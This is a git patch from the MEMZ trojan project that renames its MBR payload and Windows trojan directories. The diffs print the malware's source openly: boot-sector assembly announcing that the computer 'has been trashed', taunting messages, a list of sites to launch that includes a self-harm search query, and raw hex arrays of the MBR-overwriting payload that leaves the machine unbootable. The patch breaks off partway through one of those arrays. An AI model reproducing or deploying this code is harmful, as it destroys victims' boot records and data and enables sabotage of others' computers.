From fac6767fd914087c50a5120838097730cb89d24a Mon Sep 17 00:00:00 2001 From: Leurak Date: Sat, 29 Apr 2017 13:06:47 +0200 Subject: [PATCH] Renamed main directories --- .gitignore | 2 +- .../Data/Image/Frames/00.png | Bin .../Data/Image/Frames/01.png | Bin .../Data/Image/Frames/02.png | Bin .../Data/Image/Frames/03.png | Bin .../Data/Image/Frames/04.png | Bin .../Data/Image/Frames/05.png | Bin .../Data/Image/Frames/06.png | Bin .../Data/Image/Frames/07.png | Bin .../Data/Image/Frames/08.png | Bin .../Data/Image/Frames/09.png | Bin .../Data/Image/Frames/10.png | Bin .../Data/Image/Frames/11.png | Bin .../Data/Image/Special/01.png | Bin {PayloadMBR => NyanMBR}/Data/Image/png2bin.py | 0 {PayloadMBR => NyanMBR}/Data/Song/README.md | 0 {PayloadMBR => NyanMBR}/Data/Song/midi2bin.py | 0 {PayloadMBR => NyanMBR}/Makefile | 0 .../Source/Compressor/compress.c | 0 .../Source/Stage1/decompress.asm | 0 .../Source/Stage1/main.asm | 38 +- .../Stage2/Animation/Image/drawIntroFrame.asm | 0 .../Animation/Image/drawNormalFrame.asm | 0 .../Stage2/Animation/Image/initDrawing.asm | 0 .../Source/Stage2/Animation/countNyan.asm | 0 .../Source/Stage2/Animation/displayFrame.asm | 0 .../Source/Stage2/Animation/playNote.asm | 0 .../Stage2/Interrupts/keyboardHandler.asm | 0 .../Source/Stage2/Interrupts/timerHandler.asm | 0 .../Source/Stage2/Setup/setup.asm | 0 .../Source/Stage2/Setup/setupInterrupts.asm | 0 .../Source/Stage2/Setup/setupSpeaker.asm | 0 .../Source/Stage2/Setup/setupTimer.asm | 0 .../Source/Stage2/Utils/macros.asm | 0 .../Source/Stage2/Utils/timer.asm | 0 .../Source/Stage2/main.asm | 86 +- PayloadMBR/test.bat | 3 - {VCProject => WindowsTrojan}/MEMZ.sln | 0 .../MEMZ/MEMZ.vcxproj | 0 .../MEMZ/MEMZ.vcxproj.filters | 0 {VCProject => WindowsTrojan}/MEMZ/data.cpp | 600 +++++++------- {VCProject => WindowsTrojan}/MEMZ/data.h | 42 +- {VCProject => WindowsTrojan}/MEMZ/main.cpp | 756 +++++++++--------- {VCProject => WindowsTrojan}/MEMZ/memz.h | 128 +-- .../MEMZ/payloads.cpp | 598 +++++++------- {VCProject => WindowsTrojan}/MEMZ/payloads.h | 64 +- {VCProject => WindowsTrojan}/MEMZ/utils.cpp | 70 +- .../MEMZ/win32_crt_float.cpp | 0 48 files changed, 1192 insertions(+), 1195 deletions(-) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/00.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/01.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/02.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/03.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/04.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/05.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/06.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/07.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/08.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/09.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/10.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/11.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Special/01.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/png2bin.py (100%) rename {PayloadMBR => NyanMBR}/Data/Song/README.md (100%) rename {PayloadMBR => NyanMBR}/Data/Song/midi2bin.py (100%) rename {PayloadMBR => NyanMBR}/Makefile (100%) rename {PayloadMBR => NyanMBR}/Source/Compressor/compress.c (100%) rename {PayloadMBR => NyanMBR}/Source/Stage1/decompress.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage1/main.asm (96%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/Image/drawIntroFrame.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/Image/drawNormalFrame.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/Image/initDrawing.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/countNyan.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/displayFrame.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/playNote.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Interrupts/keyboardHandler.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Interrupts/timerHandler.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Setup/setup.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Setup/setupInterrupts.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Setup/setupSpeaker.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Setup/setupTimer.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Utils/macros.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Utils/timer.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/main.asm (96%) delete mode 100644 PayloadMBR/test.bat rename {VCProject => WindowsTrojan}/MEMZ.sln (100%) rename {VCProject => WindowsTrojan}/MEMZ/MEMZ.vcxproj (100%) rename {VCProject => WindowsTrojan}/MEMZ/MEMZ.vcxproj.filters (100%) rename {VCProject => WindowsTrojan}/MEMZ/data.cpp (98%) rename {VCProject => WindowsTrojan}/MEMZ/data.h (95%) rename {VCProject => WindowsTrojan}/MEMZ/main.cpp (96%) rename {VCProject => WindowsTrojan}/MEMZ/memz.h (96%) rename {VCProject => WindowsTrojan}/MEMZ/payloads.cpp (96%) rename {VCProject => WindowsTrojan}/MEMZ/payloads.h (96%) rename {VCProject => WindowsTrojan}/MEMZ/utils.cpp (94%) rename {VCProject => WindowsTrojan}/MEMZ/win32_crt_float.cpp (100%) diff --git a/.gitignore b/.gitignore index 980f810..c624664 100644 --- a/.gitignore +++ b/.gitignore @@ -243,6 +243,6 @@ _Pvt_Extensions *.mid *.bat *.zip -/VCProject/MEMZ.VC.db +*.db build/ Build/ \ No newline at end of file diff --git a/PayloadMBR/Data/Image/Frames/00.png b/NyanMBR/Data/Image/Frames/00.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/00.png rename to NyanMBR/Data/Image/Frames/00.png diff --git a/PayloadMBR/Data/Image/Frames/01.png b/NyanMBR/Data/Image/Frames/01.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/01.png rename to NyanMBR/Data/Image/Frames/01.png diff --git a/PayloadMBR/Data/Image/Frames/02.png b/NyanMBR/Data/Image/Frames/02.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/02.png rename to NyanMBR/Data/Image/Frames/02.png diff --git a/PayloadMBR/Data/Image/Frames/03.png b/NyanMBR/Data/Image/Frames/03.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/03.png rename to NyanMBR/Data/Image/Frames/03.png diff --git a/PayloadMBR/Data/Image/Frames/04.png b/NyanMBR/Data/Image/Frames/04.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/04.png rename to NyanMBR/Data/Image/Frames/04.png diff --git a/PayloadMBR/Data/Image/Frames/05.png b/NyanMBR/Data/Image/Frames/05.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/05.png rename to NyanMBR/Data/Image/Frames/05.png diff --git a/PayloadMBR/Data/Image/Frames/06.png b/NyanMBR/Data/Image/Frames/06.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/06.png rename to NyanMBR/Data/Image/Frames/06.png diff --git a/PayloadMBR/Data/Image/Frames/07.png b/NyanMBR/Data/Image/Frames/07.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/07.png rename to NyanMBR/Data/Image/Frames/07.png diff --git a/PayloadMBR/Data/Image/Frames/08.png b/NyanMBR/Data/Image/Frames/08.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/08.png rename to NyanMBR/Data/Image/Frames/08.png diff --git a/PayloadMBR/Data/Image/Frames/09.png b/NyanMBR/Data/Image/Frames/09.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/09.png rename to NyanMBR/Data/Image/Frames/09.png diff --git a/PayloadMBR/Data/Image/Frames/10.png b/NyanMBR/Data/Image/Frames/10.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/10.png rename to NyanMBR/Data/Image/Frames/10.png diff --git a/PayloadMBR/Data/Image/Frames/11.png b/NyanMBR/Data/Image/Frames/11.png similarity index 100% rename from PayloadMBR/Data/Image/Frames/11.png rename to NyanMBR/Data/Image/Frames/11.png diff --git a/PayloadMBR/Data/Image/Special/01.png b/NyanMBR/Data/Image/Special/01.png similarity index 100% rename from PayloadMBR/Data/Image/Special/01.png rename to NyanMBR/Data/Image/Special/01.png diff --git a/PayloadMBR/Data/Image/png2bin.py b/NyanMBR/Data/Image/png2bin.py similarity index 100% rename from PayloadMBR/Data/Image/png2bin.py rename to NyanMBR/Data/Image/png2bin.py diff --git a/PayloadMBR/Data/Song/README.md b/NyanMBR/Data/Song/README.md similarity index 100% rename from PayloadMBR/Data/Song/README.md rename to NyanMBR/Data/Song/README.md diff --git a/PayloadMBR/Data/Song/midi2bin.py b/NyanMBR/Data/Song/midi2bin.py similarity index 100% rename from PayloadMBR/Data/Song/midi2bin.py rename to NyanMBR/Data/Song/midi2bin.py diff --git a/PayloadMBR/Makefile b/NyanMBR/Makefile similarity index 100% rename from PayloadMBR/Makefile rename to NyanMBR/Makefile diff --git a/PayloadMBR/Source/Compressor/compress.c b/NyanMBR/Source/Compressor/compress.c similarity index 100% rename from PayloadMBR/Source/Compressor/compress.c rename to NyanMBR/Source/Compressor/compress.c diff --git a/PayloadMBR/Source/Stage1/decompress.asm b/NyanMBR/Source/Stage1/decompress.asm similarity index 100% rename from PayloadMBR/Source/Stage1/decompress.asm rename to NyanMBR/Source/Stage1/decompress.asm diff --git a/PayloadMBR/Source/Stage1/main.asm b/NyanMBR/Source/Stage1/main.asm similarity index 96% rename from PayloadMBR/Source/Stage1/main.asm rename to NyanMBR/Source/Stage1/main.asm index 35e0d9f..c981993 100644 --- a/PayloadMBR/Source/Stage1/main.asm +++ b/NyanMBR/Source/Stage1/main.asm @@ -1,20 +1,20 @@ -use16 -org 0x7c00 - -compressed: equ 0x7e00 -decompressed: equ 0x8E00 - -%include "decompress.asm" ; Decompress Code & Data -jmp decompressed ; Jump to the decompressed Data, booting the actual Kernel - -; Boot sector signature -times 510 - ($ - $$) db 0 -dw 0xAA55 - -; Include the compressed data -comp: incbin "../../Build/stage2-compressed.bin" ; Hardcoded build dir :( -compsize: equ $-comp - -; Align it to sectors -;align 512 +use16 +org 0x7c00 + +compressed: equ 0x7e00 +decompressed: equ 0x8E00 + +%include "decompress.asm" ; Decompress Code & Data +jmp decompressed ; Jump to the decompressed Data, booting the actual Kernel + +; Boot sector signature +times 510 - ($ - $$) db 0 +dw 0xAA55 + +; Include the compressed data +comp: incbin "../../Build/stage2-compressed.bin" ; Hardcoded build dir :( +compsize: equ $-comp + +; Align it to sectors +;align 512 times 4096 - ($ - $$) db 0 \ No newline at end of file diff --git a/PayloadMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm b/NyanMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm rename to NyanMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm diff --git a/PayloadMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm b/NyanMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm rename to NyanMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm diff --git a/PayloadMBR/Source/Stage2/Animation/Image/initDrawing.asm b/NyanMBR/Source/Stage2/Animation/Image/initDrawing.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Animation/Image/initDrawing.asm rename to NyanMBR/Source/Stage2/Animation/Image/initDrawing.asm diff --git a/PayloadMBR/Source/Stage2/Animation/countNyan.asm b/NyanMBR/Source/Stage2/Animation/countNyan.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Animation/countNyan.asm rename to NyanMBR/Source/Stage2/Animation/countNyan.asm diff --git a/PayloadMBR/Source/Stage2/Animation/displayFrame.asm b/NyanMBR/Source/Stage2/Animation/displayFrame.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Animation/displayFrame.asm rename to NyanMBR/Source/Stage2/Animation/displayFrame.asm diff --git a/PayloadMBR/Source/Stage2/Animation/playNote.asm b/NyanMBR/Source/Stage2/Animation/playNote.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Animation/playNote.asm rename to NyanMBR/Source/Stage2/Animation/playNote.asm diff --git a/PayloadMBR/Source/Stage2/Interrupts/keyboardHandler.asm b/NyanMBR/Source/Stage2/Interrupts/keyboardHandler.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Interrupts/keyboardHandler.asm rename to NyanMBR/Source/Stage2/Interrupts/keyboardHandler.asm diff --git a/PayloadMBR/Source/Stage2/Interrupts/timerHandler.asm b/NyanMBR/Source/Stage2/Interrupts/timerHandler.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Interrupts/timerHandler.asm rename to NyanMBR/Source/Stage2/Interrupts/timerHandler.asm diff --git a/PayloadMBR/Source/Stage2/Setup/setup.asm b/NyanMBR/Source/Stage2/Setup/setup.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Setup/setup.asm rename to NyanMBR/Source/Stage2/Setup/setup.asm diff --git a/PayloadMBR/Source/Stage2/Setup/setupInterrupts.asm b/NyanMBR/Source/Stage2/Setup/setupInterrupts.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Setup/setupInterrupts.asm rename to NyanMBR/Source/Stage2/Setup/setupInterrupts.asm diff --git a/PayloadMBR/Source/Stage2/Setup/setupSpeaker.asm b/NyanMBR/Source/Stage2/Setup/setupSpeaker.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Setup/setupSpeaker.asm rename to NyanMBR/Source/Stage2/Setup/setupSpeaker.asm diff --git a/PayloadMBR/Source/Stage2/Setup/setupTimer.asm b/NyanMBR/Source/Stage2/Setup/setupTimer.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Setup/setupTimer.asm rename to NyanMBR/Source/Stage2/Setup/setupTimer.asm diff --git a/PayloadMBR/Source/Stage2/Utils/macros.asm b/NyanMBR/Source/Stage2/Utils/macros.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Utils/macros.asm rename to NyanMBR/Source/Stage2/Utils/macros.asm diff --git a/PayloadMBR/Source/Stage2/Utils/timer.asm b/NyanMBR/Source/Stage2/Utils/timer.asm similarity index 100% rename from PayloadMBR/Source/Stage2/Utils/timer.asm rename to NyanMBR/Source/Stage2/Utils/timer.asm diff --git a/PayloadMBR/Source/Stage2/main.asm b/NyanMBR/Source/Stage2/main.asm similarity index 96% rename from PayloadMBR/Source/Stage2/main.asm rename to NyanMBR/Source/Stage2/main.asm index b1b66b8..1c1a118 100644 --- a/PayloadMBR/Source/Stage2/main.asm +++ b/NyanMBR/Source/Stage2/main.asm @@ -1,44 +1,44 @@ -; This is where the program starts after decompression - -use16 -org 0x8E00 - -%include "Utils/macros.asm" -%include "Setup/setup.asm" - -; Everything should be already set up, so the only -; thing we need to do here is to wait for interrupts -haltLoop: - hlt - jmp haltLoop - -; Include the interrupt handlers after the loop to -; prevent them from triggering by including the code -%include "Interrupts/timerHandler.asm" -%include "Interrupts/keyboardHandler.asm" - -%include "Utils/timer.asm" - -%include "Animation/countNyan.asm" -%include "Animation/displayFrame.asm" -%include "Animation/playNote.asm" - -; ============================== -; Variables -; ============================== - -; ============================== -; Data -; ============================== - -frames: incbin "../../Build/frames.bin" -framesLength: equ $-frames - -special: incbin "../../Build/special.bin" -specialLength: equ $-special - -song: incbin "../../Build/song.bin" -songLength: equ $-song - -message: db "Your computer has been trashed by the MEMZ trojan. Now enjoy the Nyan Cat..." +; This is where the program starts after decompression + +use16 +org 0x8E00 + +%include "Utils/macros.asm" +%include "Setup/setup.asm" + +; Everything should be already set up, so the only +; thing we need to do here is to wait for interrupts +haltLoop: + hlt + jmp haltLoop + +; Include the interrupt handlers after the loop to +; prevent them from triggering by including the code +%include "Interrupts/timerHandler.asm" +%include "Interrupts/keyboardHandler.asm" + +%include "Utils/timer.asm" + +%include "Animation/countNyan.asm" +%include "Animation/displayFrame.asm" +%include "Animation/playNote.asm" + +; ============================== +; Variables +; ============================== + +; ============================== +; Data +; ============================== + +frames: incbin "../../Build/frames.bin" +framesLength: equ $-frames + +special: incbin "../../Build/special.bin" +specialLength: equ $-special + +song: incbin "../../Build/song.bin" +songLength: equ $-song + +message: db "Your computer has been trashed by the MEMZ trojan. Now enjoy the Nyan Cat..." messageLength: equ $-message \ No newline at end of file diff --git a/PayloadMBR/test.bat b/PayloadMBR/test.bat deleted file mode 100644 index 5737c1b..0000000 --- a/PayloadMBR/test.bat +++ /dev/null @@ -1,3 +0,0 @@ -@echo off -set PATH=%PATH%;C:\Program Files\qemu -qemu-system-i386 -s -soundhw pcspk disk.img \ No newline at end of file diff --git a/VCProject/MEMZ.sln b/WindowsTrojan/MEMZ.sln similarity index 100% rename from VCProject/MEMZ.sln rename to WindowsTrojan/MEMZ.sln diff --git a/VCProject/MEMZ/MEMZ.vcxproj b/WindowsTrojan/MEMZ/MEMZ.vcxproj similarity index 100% rename from VCProject/MEMZ/MEMZ.vcxproj rename to WindowsTrojan/MEMZ/MEMZ.vcxproj diff --git a/VCProject/MEMZ/MEMZ.vcxproj.filters b/WindowsTrojan/MEMZ/MEMZ.vcxproj.filters similarity index 100% rename from VCProject/MEMZ/MEMZ.vcxproj.filters rename to WindowsTrojan/MEMZ/MEMZ.vcxproj.filters diff --git a/VCProject/MEMZ/data.cpp b/WindowsTrojan/MEMZ/data.cpp similarity index 98% rename from VCProject/MEMZ/data.cpp rename to WindowsTrojan/MEMZ/data.cpp index 8fd5dd5..e1105f8 100644 --- a/VCProject/MEMZ/data.cpp +++ b/WindowsTrojan/MEMZ/data.cpp @@ -1,301 +1,301 @@ -#include "data.h" - -#ifndef CLEAN -const unsigned char msg[] = "YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.\r\n\r\nYour computer won't boot up again,\r\nso use it as long as you can!\r\n\r\n:D\r\n\r\nTrying to kill MEMZ will cause your system to be\r\ndestroyed instantly, so don't try it :D"; -#endif - -const char *sites[] = { - "http://google.co.ck/search?q=best+way+to+kill+yourself", - "http://google.co.ck/search?q=how+2+remove+a+virus", - "http://google.co.ck/search?q=mcafee+vs+norton", - "http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend", - "http://google.co.ck/search?q=minecraft+hax+download+no+virus", - "http://google.co.ck/search?q=how+to+get+money", - "http://google.co.ck/search?q=bonzi+buddy+download+free", - "http://google.co.ck/search?q=how+2+buy+weed", - "http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic", - "http://google.co.ck/search?q=what+happens+if+you+delete+system32", - "http://google.co.ck/search?q=g3t+r3kt", - "http://google.co.ck/search?q=batch+virus+download", - "http://google.co.ck/search?q=virus.exe", - "http://google.co.ck/search?q=internet+explorer+is+the+best+browser", - "http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016", - "http://google.co.ck/search?q=virus+builder+legit+free+download", - "http://google.co.ck/search?q=how+to+create+your+own+ransomware", - "http://google.co.ck/search?q=how+to+remove+memz+trojan+virus", - "http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp", - "http://google.co.ck/search?q=dank+memz", - "http://google.co.ck/search?q=how+to+download+memz", - "http://google.co.ck/search?q=half+life+3+release+date", - "http://google.co.ck/search?q=is+illuminati+real", - "http://google.co.ck/search?q=montage+parody+making+program+2016", - "http://google.co.ck/search?q=the+memz+are+real", - "http://google.co.ck/search?q=stanky+danky+maymays", - "http://google.co.ck/search?q=john+cena+midi+legit+not+converted", - "http://google.co.ck/search?q=vinesauce+meme+collection", - "http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi", - "http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45", - "http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape", - "http://play.clubpenguin.com", - "http://pcoptimizerpro.com", - "http://softonic.com", - "calc", - "notepad", - "cmd", - "write", - "regedit", - "explorer", - "taskmgr", - "msconfig", - "mspaint", - "devmgmt.msc", - "control", - "mmc", -}; - -const size_t nSites = sizeof(sites) / sizeof(void *); - -#ifndef CLEAN -const char *msgs[] = { - "YOU KILLED MY TROJAN!\r\nNow you are going to die.", - "REST IN PISS, FOREVER MISS.", - "I WARNED YOU...", - "HAHA N00B L2P G3T R3KT", - "You failed at your 1337 h4x0r skillz.", - "YOU TRIED SO HARD AND GOT SO FAR, BUT IN THE END, YOUR PC WAS STILL FUCKED!", - "HACKER!\r\nENJOY BAN!", - "GET BETTER HAX NEXT TIME xD", - "HAVE FUN TRYING TO RESTORE YOUR DATA :D", - "|\\/|3|\\/|2", - "BSOD INCOMING", - "VIRUS PRANK (GONE WRONG)", - "ENJOY THE NYAN CAT", - "Get dank antivirus m9!", - "You are an idiot!\r\nHA HA HA HA HA HA HA", - "#MakeMalwareGreatAgain", - "SOMEBODY ONCE TOLD ME THE MEMZ ARE GONNA ROLL ME", - "Why did you even tried to kill MEMZ?\r\nYour PC is fucked anyway.", - "SecureBoot sucks.", - "gr8 m8 i r8 8/8", - "Have you tried turning it off and on again?", - "", - "Greetings to all GAiA members!", - "Well, hello there. I don't believe we've been properly introduced. I'm Bonzi!", - "'This is everything I want in my computer'\r\n - danooct1 2016", - "'Uh, Club Penguin. Time to get banned!'\r\n - danooct1 2016", -}; - -const size_t nMsgs = sizeof(msgs) / sizeof(void *); -#endif - -const char *sounds[] = { - "SystemHand", - "SystemQuestion", - "SystemExclamation" -}; - -const size_t nSounds = sizeof(sounds) / sizeof(void *); - - -#ifndef CLEAN -// Split into 2 parts to save some space. - -const unsigned char code1[] = { - 0xBB, 0xE0, 0x07, 0x8E, 0xC3, 0x8E, 0xDB, 0xB8, 0x04, 0x02, 0xB9, 0x02, - 0x00, 0xB6, 0x00, 0xBB, 0x00, 0x00, 0xCD, 0x13, 0x31, 0xC0, 0x89, 0xC3, - 0x89, 0xC1, 0x89, 0xC2, 0xBE, 0x00, 0x00, 0xBF, 0x00, 0x40, 0xAC, 0x81, - 0xFE, 0x9E, 0x07, 0x73, 0x35, 0x3C, 0x80, 0x73, 0x03, 0xE9, 0x10, 0x00, - 0x24, 0x7F, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, 0x80, 0xF9, 0xFF, 0x75, - 0xF7, 0xE9, 0xE2, 0xFF, 0x88, 0xC4, 0xAC, 0x89, 0xC3, 0xAC, 0x89, 0xF2, - 0x89, 0xDE, 0x81, 0xC6, 0x00, 0x40, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, - 0x80, 0xF9, 0x00, 0x75, 0xF7, 0x89, 0xD6, 0xE9, 0xC4, 0xFF, 0xB0, 0xB6, - 0xE6, 0x43, 0xB8, 0x03, 0x10, 0xB3, 0x00, 0xCD, 0x10, 0xBF, 0x00, 0x00, - 0xBA, 0xC0, 0x9D, 0xB9, 0x00, 0xB8, 0x8E, 0xC1, 0xB8, 0x00, 0x00, 0xB9, - 0xD0, 0x07, 0xF3, 0xAB, 0xBE, 0x9C, 0x9F, 0xBF, 0x00, 0x00, 0xE4, 0x61, - 0x0C, 0x03, 0xE6, 0x61, 0xB3, 0x01, 0x52, 0xB4, 0x86, 0xB9, 0x00, 0x00, - 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, 0x81, 0xFE, 0xE8, 0x9F, 0x7D, 0x04, - 0xAC, 0xB4, 0xF0, 0xAB, 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xE3, 0x56, - 0x89, 0xD6, 0xAD, 0x89, 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, - 0xE6, 0x42, 0xC0, 0xED, 0x05, 0xC0, 0xE5, 0x02, 0x88, 0xEB, 0x89, 0xF2, - 0x5E, 0x81, 0xFA, 0xF4, 0x9D, 0x75, 0xC3, 0xBE, 0x00, 0x40, 0xBF, 0x00, - 0x00, 0xB8, 0xE0, 0x07, 0x8E, 0xD8, 0xB8, 0x00, 0xB8, 0x8E, 0xC0, 0xFE, - 0xCB, 0xE9, 0x20, 0x00, 0xB0, 0xDC, 0xAA, 0xAC, 0xAA, 0x81, 0xFE, 0xC0, - 0x9D, 0x74, 0x42, 0x81, 0xFF, 0xA0, 0x0F, 0x74, 0x03, 0xE9, 0xEC, 0xFF, - 0x52, 0xB4, 0x86, 0xB9, 0x01, 0x00, 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, - 0xBF, 0x00, 0x00, 0x81, 0xFA, 0x9C, 0x9F, 0x75, 0x03, 0xBA, 0xF4, 0x9D, - 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xCD, 0x56, 0x89, 0xD6, 0xAD, 0x89, - 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, 0xE6, 0x42, 0xC0, 0xED, - 0x05, 0x88, 0xEB, 0x89, 0xF2, 0x5E, 0xE9, 0xB3, 0xFF, 0xBE, 0x00, 0x40, - 0xE9, 0xC1, 0xFF -}; - -const unsigned char code2[] = { - 0x55, 0xAA, 0x83, 0x11, 0x11, 0x11, 0x11, 0x00, 0x00, 0x04, 0x00, 0x00, - 0x08, 0x00, 0x00, 0x10, 0x00, 0x00, 0x20, 0x00, 0x35, 0x0B, 0x83, 0xF1, - 0xF1, 0x11, 0xF1, 0x00, 0x00, 0x4B, 0x00, 0x96, 0x04, 0x80, 0xFF, 0x00, - 0x4F, 0x4F, 0x00, 0x9F, 0x4F, 0x00, 0xEA, 0x53, 0x82, 0x1F, 0xF1, 0x1F, - 0x01, 0x42, 0x4E, 0x00, 0x4E, 0x50, 0x02, 0x12, 0x1F, 0x83, 0x10, 0x10, - 0x10, 0x10, 0x02, 0x50, 0x04, 0x02, 0x50, 0x08, 0x80, 0x10, 0x02, 0x31, - 0x1F, 0x83, 0x14, 0x14, 0x14, 0x14, 0x02, 0x80, 0x04, 0x83, 0x44, 0x44, - 0x44, 0x44, 0x02, 0x88, 0x04, 0x02, 0x80, 0x0E, 0x87, 0x40, 0x0E, 0xEE, - 0xEE, 0xED, 0xED, 0xED, 0xED, 0x02, 0xA2, 0x04, 0x02, 0xA5, 0x05, 0x82, - 0xEE, 0xEE, 0x0E, 0x02, 0x60, 0x1E, 0x02, 0x88, 0x08, 0x83, 0x46, 0x46, - 0x46, 0x46, 0x02, 0xD8, 0x04, 0x02, 0xD0, 0x0E, 0x8C, 0x00, 0xEE, 0xED, - 0xDD, 0xDC, 0xDD, 0xDD, 0xDD, 0xDD, 0xCD, 0xDD, 0xDD, 0xCD, 0x02, 0xF3, - 0x04, 0x83, 0xDD, 0xED, 0xEE, 0x00, 0x02, 0xB3, 0x1D, 0x83, 0x66, 0x66, - 0x66, 0x66, 0x03, 0x20, 0x04, 0x03, 0x20, 0x08, 0x03, 0x22, 0x0E, 0x81, - 0x00, 0xEE, 0x02, 0xFB, 0x05, 0x03, 0x41, 0x04, 0x83, 0xD0, 0x07, 0x07, - 0xD0, 0x02, 0xF9, 0x04, 0x84, 0xEE, 0x00, 0x10, 0x07, 0x07, 0x02, 0xB2, - 0x1A, 0x83, 0x6E, 0x6E, 0x6E, 0x6E, 0x03, 0x70, 0x04, 0x83, 0xEE, 0xEE, - 0xEE, 0xEE, 0x03, 0x78, 0x04, 0x03, 0x70, 0x08, 0x85, 0x00, 0x07, 0x07, - 0x00, 0xE0, 0xEE, 0x03, 0x3E, 0x08, 0x8F, 0xCD, 0xDD, 0xDD, 0x00, 0x77, - 0x77, 0x77, 0x07, 0xD0, 0xD0, 0xD0, 0xE0, 0x07, 0x77, 0x77, 0x77, 0x03, - 0x02, 0x1A, 0x03, 0x78, 0x08, 0x83, 0xEA, 0xEA, 0xEA, 0xEA, 0x03, 0xC8, - 0x04, 0x03, 0xC0, 0x08, 0x85, 0x0A, 0x00, 0x70, 0x77, 0x07, 0x00, 0x03, - 0x8E, 0x05, 0x02, 0xFA, 0x04, 0x81, 0xDC, 0xD0, 0x03, 0xA2, 0x04, 0x80, - 0x77, 0x03, 0xEA, 0x04, 0x03, 0xEE, 0x04, 0x03, 0x55, 0x1A, 0x83, 0xAA, - 0xAA, 0xAA, 0xAA, 0x04, 0x10, 0x04, 0x04, 0x10, 0x08, 0x04, 0x16, 0x0A, - 0x85, 0x0A, 0x00, 0x70, 0x70, 0x00, 0xEE, 0x02, 0xF9, 0x07, 0x03, 0x98, - 0x05, 0x80, 0xF0, 0x04, 0x38, 0x04, 0x80, 0x70, 0x04, 0x3B, 0x05, 0x03, - 0xA6, 0x19, 0x83, 0xA3, 0xA3, 0xA3, 0xA3, 0x04, 0x60, 0x04, 0x83, 0x33, - 0x33, 0x33, 0x33, 0x04, 0x68, 0x04, 0x04, 0x60, 0x0D, 0x83, 0x03, 0x00, - 0xEE, 0xDE, 0x02, 0xF1, 0x04, 0x03, 0x96, 0x07, 0x81, 0x77, 0x70, 0x04, - 0x3F, 0x04, 0x04, 0x8C, 0x04, 0x04, 0x46, 